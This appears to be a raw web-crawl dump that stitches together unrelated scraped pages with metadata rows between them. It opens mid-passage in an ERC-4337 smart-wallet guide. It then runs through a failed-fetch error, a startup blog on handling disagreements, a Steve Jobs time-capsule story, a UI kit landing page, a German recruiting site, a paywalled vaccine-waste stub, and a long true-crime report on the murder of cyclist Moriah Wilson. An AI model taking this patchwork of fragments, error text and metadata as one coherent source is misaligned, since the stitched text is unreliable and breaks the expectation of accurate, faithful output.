As the name implies, validators determine how a transaction will be validated before being executed. In this phase, the EntryPoint calls the validateUserOp function of the Kernel contract, and the validation can run in 3 different modes:

- **Sudo mode (0x0)**: the default validator checks that the transaction is signed by the owner.
- **Plugin mode (0x1)**: the Kernel contract looks up the validator to use based on the function selector in the calldata.
- **Enable mode (0x2)**: the Kernel contract enables a validator by associating the current function selector with that validator.
As for the executors, these are smart contracts that implement the additional functions of the smart wallet. This means that when calling kernel.someFunction(), someFunction() logic is implemented in the executor instead of in the Kernel contract itself, which simplifies development.
## User authentication and wallet deployment
One of our concerns was to take advantage of the options that ERC-4337 offers to implement a simple user experience, especially considering the learning curve of traditional crypto wallets, which is sometimes challenging for non-crypto users.
A key element of crypto wallets user experience is user authentication. For this, we relied on Web3Auth, which is an infrastructure solution for web3 wallets and apps that allows the implementation of social authentication -Google, Facebook, X (former Twitter)- into a web3 dApp.
Once logged in, it is possible to get the address of the Smart Wallet without the need to deploy it in the blockchain, as the address is abstracted from the final signature obtained by Web3Auth. The wallet will be deployed only after a userOperation is performed with the new address.
The following image illustrates the prototype architecture:
## Gas sponsorship
A great ERC-4337 feature is the possibility to sponsor transaction fees both in gwei and in ERC-20 tokens. To achieve this it is necessary to set different gas policies. ZeroDev allows the implementation of three different types of policies:
- Project policies
- Contract policies
- Wallet policies
These can be configured via the API, where it is also possible to set fee limits:
- Amount of gas
- Amount of requests
- Gas price
- Amount of gas per transaction
## Example: Create UserOperation
This code snippet shows the creation of a function that executes a UserOperation. ZeroDev's SDK has a sendUserOperation function, which expects the following parameters:
- **Target**: address of the contract to interact with.
- **Data**: all the information about the function that will be executed (contract ABI, function name, function arguments).
    // encodeFunctionData typically comes from viem, which the ZeroDev SDK builds on
    const userOperation = await zeroDevSigner.sendUserOperation({
      target: contract.target,
      data: encodeFunctionData({
        abi,
        functionName: "functionName",
        args: ["Argm1", "Argm2"],
      }),
    });
|
40,781,632 | https://www.bizjournals.com/triangle/news/2024/06/24/apple-delays-plans-rtp-campus-raleigh-hub.html | null | null | Request unsuccessful. Incapsula incident ID: 6525000170225277148-465081139665372239 | true | true | true | null | 2024-10-12 00:00:00 | null | null | null | null | null | null | null |
20,108,030 | https://matterapp.com/blog/decision-disagreement-framework-how-we-encourage-disagreements-at-matter/ | Decision Disagreement Framework - How we encourage disagreements at Matter | Jeff Hagel President; H | As a team member, how do you voice your disagreement with a decision that you believe is not in the best interest of the company? As a leader, how do you enable your team to disagree with decisions in an equitable and productive way?
We set out to answer these questions at Matter. Although there are a number of useful frameworks for making NEW decisions (e.g., those shared by Gokul at Square, Brian at Coinbase, and Bain), **we couldn’t find a framework for handling and supporting disagreements after decisions have been made, especially if you weren’t a part of making that decision**. We took inspiration from existing frameworks to create the Decision Disagreement Framework.
Since we began implementing this framework, I’ve been blown away by the results. By embracing this framework, our team has come up with significantly better, more innovative, and less technically complex solutions. No one has felt like they have compromised or “given up” on important issues. In this post, I’ll share how our Decision Disagreement Framework works. You can view our decision disagreement framework template here.
Here is a step-by-step guide for using the decision disagreement framework:
## 1. Set the Parameters
**Determine if you should use the decision disagreement framework**
**If you are the one disagreeing with a decision:**
Next time you disagree with a decision ask yourself:
Will the decision slow down, harm, or break the business?
If your answer is yes, use the framework. If not, the disagreement is likely not worth the time and effort involved in using the framework.
**If you are on the receiving end of a team member’s disagreement:**
First, acknowledge the disagreement and paraphrase the opinion of the person disagreeing to make sure they know they have been heard. Second, ask the person to answer the question above.
**Define the disagreement**
Brevity is key. Define the disagreement with a maximum of 1 to 3 sentences.
**Decide on the decision maker.**
There can only be one decision maker. Although each team member will be heard, one person will make a final decision for the good of the business. If you’re a startup with less than 15 people or at a startup that is pre-product-market fit, this person should be the CEO. If you’re at a larger company, the decision maker should be a lead or head of a cross-functional group. This may be a Head of Product, Head of Design, or Head of Engineering. Pick the individual that makes the most sense for the given decision. Large companies may require an additional approver (e.g., a General Manager, Chief Product/Engineering/Design Officer or even the CEO). However, keep in mind that the framework is optimally suited for smaller teams and companies.
**Determine the stakeholders**
List all the people who need to have input before the decision maker can make their decision. This step is necessary to make sure everyone involved has dedicated time to communicate their opinion and feel heard before the final decision is made.
## 2. Deliberate the Options
Prior to bringing stakeholders together, the person who raises the decision disagreement must list 2 to 3 initial resolution options to discuss as a team. This is a key time-saver: By doing this before the group meets, the person raising the disagreement productively processes their thoughts and prepares various options along with each option’s effort, pros, and cons. As an optional step, stakeholders may be sent the various resolution options prior to the meeting.
This step aligns with one of the most important reasons that people join small companies: They want to be a part of the process, not just told what to do.
Remember that it’s okay if their option isn’t part of the final decision, as long as the team has given it thoughtful time and consideration. This means listening to understand or active listening. Contrast this with listening to respond where individuals listen as they think about their own ideas (whether they agree or disagree) and devise their response.
## 3. Collect Votes, Make the Decision, and Document the Rationale
After all options have been reviewed and discussed as a group, the decision maker should ask each stakeholder: *Which option do you vote for and why?*
In contrast to blind voting, this should be done openly, in the group setting. This is not only an exercise in efficient decision making, it is one for improving transparency, honesty, and candor - key skills for working well within small companies.
After the decision maker has heard from each stakeholder, it’s time for that person to make a decision and explain the rationale. After the decision has been stated, the decision maker requests that each team member commit support to the decision aloud. This creates a shared mindset and path for the team to move forward for the good of the company. Finally, the decision maker will share the decision and its rationale with the entire company within 24 hours. If your company uses Slack, consider sharing the decision in the general channel along with the completed worksheet. If your company does not use Slack, a company-wide email is a good option for sharing the decision and its associated rationale.
At Matter, using this framework has provided a much more harmonious method for dealing with disagreements, as well as significantly better solutions.
Importantly, this framework doesn’t require folks to compromise, surrender, or give up their strong options. Rather, it’s a team-based framework that leads to team-oriented resolutions.
You can view our decision disagreement framework template here.
## When should the decision disagreement framework be used?
Not every decision warrants using a decision disagreement framework. Use a decision disagreement framework to work through conflicts that could slow down, harm, or break your business. Let’s look at a couple of examples:
**Example 1: Not Appropriate for the Decision Disagreement Framework**
Product/Engineering doesn't like the color of a button. Why isn't this appropriate for the decision disagreement framework? One, this is a subjective opinion that is not likely to slow down your company or harm long-term prospects. Two, this could be resolved with a short conversation with the designer that involves quick feedback, a timely decision, and brief communication of the rationale for the decision.
**Example 2: Appropriate for the Decision Disagreement Framework**
Design created a new user experience with a filtering option for sorting through a list of items. This sorting feature took design less than a day to design. When engineering prepared to work on this feature, they realized it would take two weeks of work due to all the hidden complexities. In this scenario, engineering could use the decision disagreement framework to productively and efficiently meet with key stakeholders (engineering, design, and product) to decide how to move forward in a way that is best for the business.
## Why is this decision disagreement framework useful?
- It helps leaders create a culture of transparency, honesty, and candor which is key for people who want to work at small companies.
- It helps the person who disagrees share their concerns in a concise, efficient, and productive manner.
- It helps team members empathize with the individual’s point of view. In the use case above, product and design might be surprised to learn that a filtering capability takes two weeks to build.
- It helps the person who disagrees learn about the research and deep thinking that went behind the decision.
- It helps get the initial options on the table. Rather than have the person who disagrees “wing it” and try to whiteboard their concerns in real time, options are thought through prior to bringing them to the team for consideration.
- It helps the team reach a shared understanding of the complexities of the disagreement and the resolution. Once a decision is made, everyone is able to move forward with a decision that’s best for the business.
## Conclusions:
- Disagreement is not a dirty word 💡
- Effective leadership means the ability to create and facilitate a user-obsessed culture where candid disagreement is encouraged 💬
- Disagreement must happen if a decision could slow down, harm, or break your business 💯
- Practice active listening, not listening to respond 👂
- Productive decision disagreements will lead to much better outcomes 🔮
If the way we work at Matter resonates with you, we’d love to chat! If you’re interested in joining the Matter team, please view our career opportunities here.
Thanks to Danielle Roubinov, Kerem Kazan, and Lenny Rachitsky for reading drafts of this and providing candid feedback. | true | true | true | How do you disagree with a decision that is not in the best interest of the company? As a leader, how do you enable your team to disagree in a productive way? Learn how with Matter's Decision Disagreement Framework. | 2024-10-12 00:00:00 | 2019-06-05 00:00:00 | website | matterapp.com | matterapp.com | null | null |
|
7,227,537 | http://www.complex.com/tech/2014/02/steve-jobs-time-capsule | A Time Capsule Buried By Steve Jobs Has Been Dug Up 30 Years Later | Jason Duaine Hahn | # A Time Capsule Buried By Steve Jobs Has Been Dug Up 30 Years Later
A modern day treasure hunt.
Back when Steve Jobs was in Aspen, Colorado, in 1983 to give a talk at the International Design Conference, he decided to have a little fun and bury a time capsule in an undisclosed location. Now, 30 years later, the capsule has been dug up, and the thanks goes to a reality television show.
The team, from National Geographic's reality show "Digger," unearthed the 13-foot-long tube in Aspen, which contained a bunch of things that were important to Jobs. So far, the team has said that the tube contained personal photographs of Jobs, a mouse for the Lisa computer (which was one of the first commercial mice ever sold), and a six-pack of beer that was meant for the crew that found the capsule. The other items within the capsule will be revealed in an upcoming episode of the show.
Still, can't help but ask: isn't **30 years** just a little too soon?
[via *CNET*] | true | true | true | A modern day treasure hunt. | 2024-10-12 00:00:00 | 2013-09-23 00:00:00 | https://images.complex.com/complex/image/upload/ar_1.91,c_fill,g_auto,q_auto/v20240908/sanity-new/tmp-name-3-547-1670627818-115_16x9-6646260 | article | complex.com | Complex | null | null |
16,829,948 | https://tabler.github.io/ | Tabler | null | # Develop beautiful web apps with Tabler
Tabler is a free and open source web application UI kit based on Bootstrap 5, with hundreds responsive components and multiple layouts.
## Free and open source
A big choice of free UI elements and layouts in one efficient, open source solution
## Based on Bootstrap 5
Based on the latest version of Bootstrap, Tabler is a UI Kit of the future
## Modern design
Beautiful, fully responsive UI elements that will make your design modern and user-friendly
## Benefit from Tabler’s top-notch features
## Multiple Demos
6 Pre-built layout options to cater needs of modern web applications. Ready-to-use UI elements enable to develop modern web application with great speed
## Create a perfect interface. Make your life easier.
### Designed with users in mind
Tabler is fully responsive and compatible with all modern browsers. Thanks to its modern, user-friendly design you can create a fully functional interface that users will love. Every UI element has been created with attention to detail to make your interface beautiful!
### Built for developers
Having in mind what it takes to write high-quality code, we want to help you speed up the development process and keep your code clean. Based on Bootstrap 5, Tabler is a cutting-edge solution, compatible with all modern browsers and fully responsive.
### Fully customizable
You can easily customize the UI elements to make them fit the needs of your project. And don’t worry if you don’t have much experience - Tabler is easy to get started!
## Dark theme whenever you need it ✨
### Change default variant when you need
Tabler is a beautiful dashboard that comes in 2 versions: Dark and Light Mode. If you are looking for a tool to manage and visualize data about your business, this dashboard is the thing for you. It combines colors that are easy on the eye, spacious cards, beautiful typography, and graphics.
### All components available in dark mode
Tabler contains a vast collection of assorted reusable dark UI components, page layouts, charts, tables, UI elements, and icons.
### A lot of reasons why dark theme are used widely
Dark mode saves battery life and can reduce eye fatigue in low-light conditions. The high contrast between text and background reduces eye fatigue, and the dark screen helps you focus your eyes longer and helps your brain keep more attention on the screen.
## Trusted by hundreds
Our users send us a bunch of smiles about our services, and we love them 😍
## From our blog
Stay updated with the latest news, tutorials, and guides from our team.
### Tabler Avatars - free user profile pictures!
Discover Tabler Avatars, our new open-source product featuring 100 customizable placeholder user profile pictures. Enhance…
### Exciting New Illustration Additions to Our Library
We are thrilled to announce the latest update to our illustration library, featuring five new…
### Tabler Illustrations is now available!
Discover the latest updates and sneak peeks from the Tabler team, including the new Tabler…
Can’t find the answer you’re looking for? Reach out to our customer support team. | true | true | true | Tabler comes with tons of well-designed components and features. Start your adventure with Tabler and make your dashboard great again. For free! | 2024-10-12 00:00:00 | null | website | tabler.io | Tabler | null | null |
|
10,637,991 | http://blog.startupcvs.com/2015/11/27/the-most-impressive-cv-i-have-ever-seen/?utm_source=hackernews&utm_medium=social&utm_campaign=bestcv17112015 | Eine für alle | null | Recruiting-Expertise trifft KI
Mit Rundum-Angebot für den gesamten Job-Lifecycle und KI-basiertem Matching.
# Eine für alle
So entsteht ein Angebot, das weit mehr ist, als klassisches Recruiting. Für unsere Talents & Professionals sind wir Karriere-Begleiterin, liefern Infos & Tools rund ums Arbeitsleben und – auf Wunsch, KI-unterstützt personalisierte Jobangebote. Unseren Companys bieten wir den Zugang zu passenden Kandidat:innen für ihre Teams mit Expertise, active Sourcing und KI-basiertem Matching.## Unser Angebot für dich
Talents & Professionals
Tools und Inhalte rund um Werte, Führungsrollen, Konfliktlösung, richtig gute Meetings u. v. m.
Dazu spannende Jobangebote und exklusive Tipps von unseren Recruiting-Profis.
Einfach registrieren und alles kostenfrei nutzen.
Companys
Unsere Recruiting-Profis verschaffen dir Zugang zu den richtigen Kandidat:innen, mit Active Sourcing und KI-gestütztem Matching.
Für einzelne Stellen, oder ganze Teams.
Faire Konditionen und volle Kostenkontrolle.
Medical
Exklusive Jobangebote für Vertretungsärzt:innen in diversen Positionen und Fachrichtungen.
Direkter Zugang zu interessierten Mediziner:innen für Kliniken und Einrichtungen.
Persönlich betreut durch unsere Recruiting-Profis.
## Erfolgsgeschichten
LIZ Smart Office GmbH
Mit Taledo fühlen wir uns wie im Talente-Paradies! Wir schätzen besonders den professionellen Service, das Engagement und nicht zuletzt die Qualität der Kandidat:innen.
Franzisca Engels, COO
Über
LIZ Smart Office GmbH
Make any place your workplace. Plane deine Woche in Abstimmung mit deinem Team und buche Arbeitsplätze, Meetingräume und weitere Ressourcen mit der hybriden App. Optimiere zusätzlich deine Büronutzung mit oder ohne Sensoren.
Quality Match GmbH
Quality Match arbeitet in einem hochspezialisierten technischen Umfeld. Taledo sucht für uns aktiv nach Kandidat:innen, die diesem hohen Qualitätsanspruch gerecht werden.
Dr. Daniel Kondermann, Managing Director
Über
Quality Match GmbH
Wir sind darauf spezialisiert, durch verbesserte Qualitätssicherung und optimierte Annotationen die Qualität von Daten zu steigern. Unsere Expertise besteht darin, die Präzision und Verlässlichkeit von Datasets sicherzustellen, welche das Fundament für das Training von KI-Modellen bilden.
Pleodat GmbH
Taledo ist für uns bei Pleodat mehr als nur ein externer Recruiter. Wir bauen gemeinsam strategisch ein Team auf, aus Menschen mit herausragenden Ideen, besonderer Expertise und Leidenschaft.
Dr. Georg Loepp, Managing Director
Über
Pleodat GmbH
Pleodat will mit einem neuartigen Informationssystem mit kognitiven Ansätzen die Welt der Datenhaltung auf den Kopf stellen. Ziel ist es, aus Daten die Zukunft des Wissens zu bauen und unsere digitale Gesellschaft sicherer, vertrauensvoller und transparenter zu gestalten. | true | true | true | null | 2024-10-12 00:00:00 | 2012-01-01 00:00:00 | null | null | null | null | null | null |
26,201,751 | https://dailymemphian.com/section/coronavirus/article/20087/shelby-county-health-tosses-13000-vaccine-doses | 1,300 vaccine doses tossed in Memphis during bad weather | Jane Roberts | # 1,315 doses had to be tossed in inventory error
Health Department contracts with Regional One Health for pharmacy support to manage vaccine inventory.
# Topics
coronavirus vaccine, wasted doses, Shelby County Health Department

#### Jane Roberts
Longtime journalist Jane Roberts is a Minnesotan by birth and a Memphian by choice. She's lived and reported in the city more than two decades. She covers business news and features for The Daily Memphian.
Want to comment on our stories or respond to others?Join the conversation by subscribing now. Only paid subscribers can add their thoughts or upvote/downvote comments. Our commenting policy can be viewed here. | true | true | true | Shelby County Health Department threw out 1,315 doses of COVID-19 vaccine that expired during the snow days. | 2024-10-12 00:00:00 | 2021-02-19 00:00:00 | https://thememphian.blob.core.windows.net/sized/48833_1200 | website | dailymemphian.com | The Daily Memphian | null | null |
24,568,991 | http://davidyyang.com/pdfs/revolutions_draft.pdf | null | null | null | true | false | false | null | null | null | null | null | null | null | null | null |
8,421,329 | http://www.nytimes.com/2014/10/04/business/justices-weighing-wages-for-after-work-screenings-.html | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
22,970,367 | http://www.vishalchovatiya.com/7-best-practices-for-exception-handling-in-cpp-with-example/ | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
4,076,625 | https://www.nytimes.com/2012/06/07/arts/video-games/nintendos-coming-game-system-wii-u.html?pagewanted=all | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
39,191,661 | https://www.cbsnews.com/news/kaitlin-armstrong-anna-moriah-mo-wilson-cyclist-murder-48-hours/ | How was fugitive Kaitlin Armstrong caught? She answered U.S. Marshals' ad for a yoga instructor | Jonathan Vigliotti | # How was fugitive Kaitlin Armstrong caught? She answered U.S. Marshals' ad for a yoga instructor
Kaitlin Armstrong is serving 90 years in prison for murdering professional up-and-coming gravel cyclist Anna Moriah "Mo" Wilson. It's a story that drew international headlines because after being suspected of killing Wilson in Texas, Armstrong vanished -- seemingly into thin air. The search for the suspected killer sparked what would become an international manhunt -- first leading authorities across the United States, and then eventually to the beaches of Costa Rica.
In June 2022, one month after Armstrong disappeared, Deputy U.S. Marshals Damien Fernandez and Emir Perez traveled to Costa Rica. A source told them Armstrong could be hiding out in Santa Teresa. They knew finding Armstrong in the small, tourist-filled village was going to be a challenge -- along the way, Armstrong used multiple identities and changed her appearance -- even getting plastic surgery.
They hit dead end after dead end. After many intense days of searching for Armstrong with no luck, the U.S. Marshals decided to try one last tactic, hoping that her love of yoga would pay off for them.
"We decided we were gonna put an ad out … or multiple ads for a yoga instructor and see -- what would happen," Perez told "48 Hours" contributor Jonathan Vigliotti.
But after almost a week of hunting, even that didn't seem to be working. Perez and Fernandez were about to head back to the States, when suddenly they got a break.
## CYCLIST MO WILSON WAS FORGING HER OWN PATH
In March 2022, up-and-coming pro gravel bike racer –25-year-old Anna Moriah Wilson, known as "Mo" to some, appeared on the "Pre Ride Show," an online program about cycling.
MORIAH WILSON ("Pre Ride Show interview): So excited to be here. It feels like the first big race of the year so yeah … I'm ready to kick it off."
Just two months later, Wilson was found murdered -- the news shocking the cycling community.
**Lisa Gosselin Lynn**: I don't think anybody could really believe it at first. You know, why would anybody wanna hurt or harm or kill this lovely, talented young woman?
Lisa Gosselin Lynn is the editor of Vermont Sports Magazine and Vermont Ski and Ride Magazine. She is also a CBS News consultant.
Lynn had been following Wilson's career for many months before her tragic death.
**Lisa Gosselin Lynn**: Moriah was pretty much winning every race that she entered, winning or finishing in the top two. And the races that she entered were top tier.
**Lisa Gosselin Lynn**: Moriah had the potential to be one of the top bike racers, definitely in the country, and probably in the world.
Remarkably, Lynn says that Wilson was new to the pro cycling world. Her first passion had been downhill ski racing, a love shared by her close-knit family.
**Lisa Gosselin Lynn**: She was born into a family of really great athletes. Her father Eric had been on the U.S. Ski Team. … and Moriah's aunt … actually was a two-time Olympic Nordic ski racer.
And it's no surprise that Wilson was drawn to outdoor endurance sports. She was raised in northern Vermont next to Kingdom Trails, a mecca for skiers and mountain bikers.
**Lisa Gosselin Lynn**: And that was her playground.
Wilson attended Burke Mountain Academy, an elite ski school that produced Olympic greats like two-time Gold medalist Mikaela Shiffrin. Wilson had hoped to make the U.S. Ski Team, but knee injuries eventually ended her skiing career. That's when she switched sports.
**Lisa Gosselin Lynn**: She had used cycling as a way for rehabbing and kind of building back her strength. What was fascinating to me was she then went on to Dartmouth. She got an engineering degree. And after doing that, she went to her mother and said, "Hey Mom, I think I want to be a professional cyclist."
And Wilson told the "We Got to Hangout" podcast that she wanted to do much more than just win races.
MORIAH WILSON ("We Got to Hangout"interview): How can I inspire people? How can I give back to the cycling community? How can I bring more people into the sport? How can I make it more inclusive? … I wanna find meaning and purpose in cycling that goes like far beyond the result.
Wilson eventually moved to San Francisco where she focused on cycling, and quickly rose to the top of the sport.
**Lisa Gosselin Lynn**: Moriah was forging her own path. … She knew what she wanted to do. And she was working hard to pursue it.
On May 10, 2022, just one week before her 26th birthday, Wilson arrived in Austin, Texas, to prepare for the Gravel Locos bike race — a race she was favored to win. Wilson stayed with a close friend in her Austin apartment. But the next evening, just before 10 p.m., the friend returned home and discovered Wilson, who had been shot multiple times. She called 911.
CAITLIN CASH | 911 call: ... she's laying on the bathroom floor and there's blood everywhere.
Wilson's friend tried CPR, but it was too late.
**Det. Marc McLeod**:** **It sounded like it started off near the door … and went backwards. Like she was trying to get away or there was some sort of struggle.
Austin Police Officers Marc McLeod and Jonathan Riley worked the case from the beginning.
**Det. Marc McLeod**: Whoever shot her at that point stood over top of her and shot her at least once.
Investigators wondered who could have murdered this promising young athlete. As they canvassed the immediate area, police discovered a possible clue. Wilson's expensive racing bicycle had been discarded in the bushes.
**Det. Jonathan Riley**: So, at that point … OK. Is this a burglary, a robbery gone wrong?
But that theory was quickly dismissed because there was no sign of a break-in. Then, police learned that just hours before Wilson was found murdered, at around 8:30 p.m., she had been dropped off by another professional bike racer named Colin Strickland.
**Det. Marc McLeod**: So, obviously the focus would be … who's this Colin Strickland?
**Lisa Gosselin Lynn**: Colin Strickland was a very good gravel racer. … He was at the top echelon.
Colin Strickland, who was 35, was considered a pioneer in the sport. He had won some of the most prestigious races and was sponsored by the industry's top brands, like Red Bull.
In 2020, he appeared in an online video called Wahoo Frontiers about his long and successful career.
COLIN STRICKLAND (Wahoo Frontiers video): My name is Colin Strickland and I'm a bicycle racer and a general entertainer.
**Chris Tolley**: Pretty early on I looked up to Colin when I was coming up on the scene.
Chris Tolley is friends with Strickland. They met on the racetrack.
**Chris Tolley**: He was the one to beat. … He loved to kind of create a show around bike racing — kind of selling bike racing. He was really passionate about it.
And Tolley said although his friend had been popular with women, he eventually became serious with a woman named Kaitlin Armstrong. However, in a social media post after the crime, Strickland wrote that about six months before Wilson's murder, during a short breakup with Armstrong, he did have a "brief romantic relationship" with Wilson that "spanned a week or so." He said that it ended, and their relationship had turned into a "platonic and professional one."
**Chris Tolley**: He just wanted to be friends with, like, someone who was going to do great things in cycling.
The day after Wilson's murder, police visited and spoke to Strickland at his home.
**Det. Marc McLeod**: My … my personal take was he was being very cooperative, being very forthcoming. Um, obviously he was in shock.
**Jonathan Vigliotti**: Being very transparent.
**Det. Marc McLeod**: Very transparent. Yeah.
And investigators say, when he agreed to go down to the police station to be interviewed, he didn't seem to hold back when telling them about the day he spent with Wilson — a day that would end up being her last.
That day in May was hot, in the 80s. And this story started with a swim at a local outdoor pool. Strickland told detectives he took Wilson there on the back of his motorcycle to cool off.
**Det. Marc McLeod**: They went swimming, then they got food.
Wilson and Strickland are seen on the restaurant's security camera.
**Jonathan Vigliotti:** I know he's being transparent at this point during this questioning, but what he's saying is starting to sound a lot like a date.
**Det. Jonathan Riley**: Yes.
**Det. Marc McLeod**: Oh yeah. A hundred percent.
Investigators had a lot of questions and their prior visit to Strickland's home had raised even more. On the night of Wilson's murder, police discovered an important clue on video from a neighbor's security camera. The video was taken just one minute after Wilson was dropped off.
**Det. Marc McLeod**:** **There's a video from a Ring doorbell camera that clearly shows like a black SUV with a bike rack. … You can't see the license plate because of the bike rack on it.
**Det. Jonathan Riley**: So, it was obviously … we need to focus on this.
And a vehicle that fit that description was outside Strickland's house. Who was driving the black Jeep SUV with the bike rack? The answer would lead directly to another woman.
## WHO IS KAITLYN ARMSTRONG?
The day after Wilson's murder, investigators quickly had an answer to who could have been driving that black Jeep that was seen on security cameras shortly before her death.
Investigators had spotted a similar looking Jeep in Strickland's driveway when they spoke to him.
**Det. Jonathan Riley**: They see a black Jeep with the bike rack on the back of it. **… **so at that point we run the license plate, and it comes back that it's registered to Kaitlin Armstrong.
Kaitlin Armstrong, Colin Strickland's girlfriend. Tolley says he knew her very well.
**Chris Tolley**: We connected pretty early on. … Kaitlin and I became friends.
They were both from the Midwest.
**Chris Tolley**: We kinda had a similar — like, upbringing, and so I think that kind of — you know, help us become, like, even better friends. … She'd come over to parties I would have.
Armstrong had a background in finance and loved yoga.
**Chris Tolley**: She had a really strong, you know, kind of — you know, love for travel, love — you know, she had spent time pretty much, you know, globe-hopping around the world … really, you know, a kind of interesting person.
Armstrong got certified as a yoga instructor in Bali. After she met Strickland in 2019, she also started getting into cycling.
**Chris Tolley**: He was very willing to kind of show her, you know, what his passions were and how passionate he was for cycling and, you know, get her involved with it **… **and she also became … kind of addicted to cycling, along with Colin.
Armstrong even started racing on an amateur level.
**Chris Tolley**: At the end of the day, like, I feel like they had a pretty, like, normal relationship. They both ride bikes together. They would, you know, do fun stuff. And, you know, then 2020 happened and the pandemic started. So everyone was kind of, you know, forced with – you know, close quarters with their significant others.
The couple eventually moved in together.
**Chris Tolley**: The moment I — I saw the relationship become more serious is you know, they talked about — that they'd purchased a house recently — together, which I thought, you know, was a pretty big indication that it's — you know, a serious relationship.
They also started a business together, restoring classic trailers.
**Chris Tolley**: I think she was helping with the finance side of things. Colin was doing a lot of the operations. … their relationship went from, you know, just a — normal couple to also owning a business together.
But things got bumpy in late 2021.
**Chris Tolley**: The breakup, I personally didn't know, like, they were split up at the time. … neither of them mentioned anything to me.
It was during this time that Strickland and Wilson had briefly dated. Although Strickland had said that they had broken it off, Wilson seemed confused in the aftermath. Pilar Melendez covered the case for the Daily Beast.
**Pilar Melendez | Daily Beast senior reporter**:** **Around this time, I think Mo was pretty confused about the status of her relationship with Colin. … and she literally wrote:
...This weekend was strange for me…
...If you just want to be friends…that's cool,
…Honestly…my mind has been going in circles…
**Pilar Melendez**: It sounds like someone who's in their early 20s who just wants to know the status of her relationship with someone that's confusing her. And it seems totally reasonable that she might be confused.
Strickland had a lot to say about his relationship with Armstrong.
**Det. Marc McLeod**: He starts to portray her as being the jealous type, even saying things like," I can't keep people in my phone." Like "Mo's not in my phone as Mo."
Strickland told investigators he kept Wilson's phone number under an alias in his contacts, and on that evening after he'd been out with Wilson at the pool, he texted Armstrong that he'd been out running an errand and that his phone had died. That was not true.
Investigators say, there were other clues pointing toward Armstrong.
**Det. Jonathan Riley**: … on the night of the murder, Kaitlin Armstrong's phone was not connected to a cell network.
**Jonathan Vigliotti**: Not connected?
**Det. Jonathan Riley**: Correct. So, whether she powered it off, whether she put in an airplane mode, uh, there's some something happened that her phone was not communicating with any cellphone towers.
**Jonathan Vigliotti**: Do you think this was on purpose?
**Det. Jonathan Riley**: Absolutely … in this day and age, if your phone is off and not connected to a network, you're either the victim of a crime or you're probably committing one.
**Jonathan Vigliotti**: A silent phone speaks louder in some cases than actions.
**Det. Jonathan Riley**: Oh, absolutely.
Strickland also shared that he had bought handguns for Armstrong and himself for personal security
**Det. Marc McLeod**: He talks about how they purchase guns.
**Det. Marc McLeod**: And that there are these two guns and that she has a gun, um, they've taken lessons and that those — these guns are back at the house. And so a few things like that start to paint a picture of like, this could — it could definitely be her.
Police worked quickly. That same day, investigators picked Armstrong up on an old warrant for failing to pay for a Botox treatment.
DETECTIVE CONNER: ... what were you doing yesterday?
KAITLIN ARMSTRONG: I would like to leave.
**Det. Marc McLeod**: And she's just kind of sitting there and she's not showing very much emotion at all. … typically when we see some interviews going on and if you didn't do it, this is your, like, you're going to be like, you know, not me, not it. I want out of this room. What do you want to know? … So that you don't come back looking for me. And there was none of that.
DETECTIVE CONNER: Is there any explanation as far as why the vehicle would be over there?
KAITLIN ARMSTRONG: I would like to leave ...
**Det. Jonathan Riley**: She was almost completely disinterested in — in hearing what the detectives had to say.
**Jonathan Vigliotti**: So, it sounds like this is a big red flag immediately?
**Marc McLeod**: Oh —
**Jonathan Riley**: Oh, absolutely.
But investigators had to let Armstrong go. There was a problem — Armstrong's birthdate didn't match the date on the warrant, so the warrant wasn't valid, and police didn't have enough to charge her with anything else.
Two days after that interview, police got an unexpected call. It was from a friend of Armstrong. Police say the caller told them that Armstrong was so angry about Strickland's relationship with Wilson, that she wanted to kill her. It was yet another indication that they were on the right track. A few days later, an arrest warrant was issued, but when police went looking for Armstrong, she was gone.
## ON THE HUNT FOR KAITLIN ARMSTRONG
After Kaitlin Armstrong vanished, U.S. Marshals got the job of tracking her down.
**Chris Godsick**: Plain and simply the Marshals are man hunters.
Chris Godsick hosts and produces a podcast with the U.S. Marshals Service. His "Chasing Evil" podcast tells stories of some of the Marshals Service's biggest cases, including the hunt for Armstrong.
**Chris Godsick**: Nobody thought Kaitlin Armstrong was going to run and she surprised them all. She disappeared.
"CHASING EVIL" PODCAST: Kaitlin Armstrong ran from a murder charge. … But the U.S. Marshals Lone Star Fugitive task force had a different plan …
**Jonathan Vigliotti**: So take me through this. … Where do you begin when you're looking for somebody that does not want to be found?
**Deputy U.S. Marshal Emir Perez**: You know, it depends on the case, honestly. … we look for friends, sometimes we look for … family.
**Deputy U.S. Marshal Damien Fernandez**: One of the things that I did was collect as many photos as I could.
Damien Fernandez and Emir Perez are Deputy U.S. Marshals. They joined Austin Police Officers Jonathan Riley and Marc McLeod on the case. The team, based in Texas, is known as the Lone Star Fugitive Task Force.
With no sign of Armstrong, the task force suspected she may have left town headed for her sister Christie's place in upstate New York.
**Det. Marc McLeod**: We were thinking maybe she's driving cross country. We didn't know.
Their instincts were right. In upstate New York, another Deputy U.S. Marshal managed to track down Armstrong's sister.
**Jonathan Vigliotti**: What did the sister say?
**Deputy U.S. Marshal Emir Perez**: The sister ultimately said … that her sister had come to visit her … and stayed with her a couple of days, but that she had dropped her off at the airport in Newark. And last she heard, she was gonna board a flight back to Austin, but then called her back later and said that she decided that she was gonna drive back.
**Det. Marc McLeod**: … which made absolute -- no sense to any of us that you would just drive back.
When the task force checked outbound flights at Newark Airport, no reservations had been made in Kaitlin Armstrong's name.
**Det. Marc McLeod**: We never got a hit on Kaitlin Armstrong's passport.
But the team had a hunch because Christie Armstrong told the Deputy U.S. Marshal in New York that she didn't know where her passport was. So they checked with their contact at Homeland Security.
**Det. Jonathan Riley**: And within minutes of reaching out to him, he got back to me and he's like, yeah, we're showing Christie Armstrong traveled out of Newark, New Jersey, International Airport on a one-way flight to Costa Rica
**Jonathan Vigliotti**: You knew it.
**Emir Perez**: I said, there's no way that the sister left. And we're looking for her and we can't find Kaitlin. No, that's Kaitlin.
The U.S. Marshals suspected that Kaitlin Armstrong had used her sister's passport to flee. Christie Armstrong later emphasized to authorities that she did not give her sister the passport. She has never been charged with any crime related to the case.
Kaitlin Armstrong landed in Costa Rica, the gem of Central America and home to mountains, tropical rain forests and white sand beaches as far as the eye can see.
But she didn't spend much time in San José. Shortly after arriving, Armstrong disappeared again — and she had a huge lead on the U.S. Marshals. Perez and Fernandez arrived in Costa Rica a month after Armstrong.
**Jonathan Vigliotti**: This is you guys now on the hunt. How intense is it once you touch down in Costa Rica? What happens?
**Deputy U.S. Marshal Damien Fernandez**: You're on a timeline.
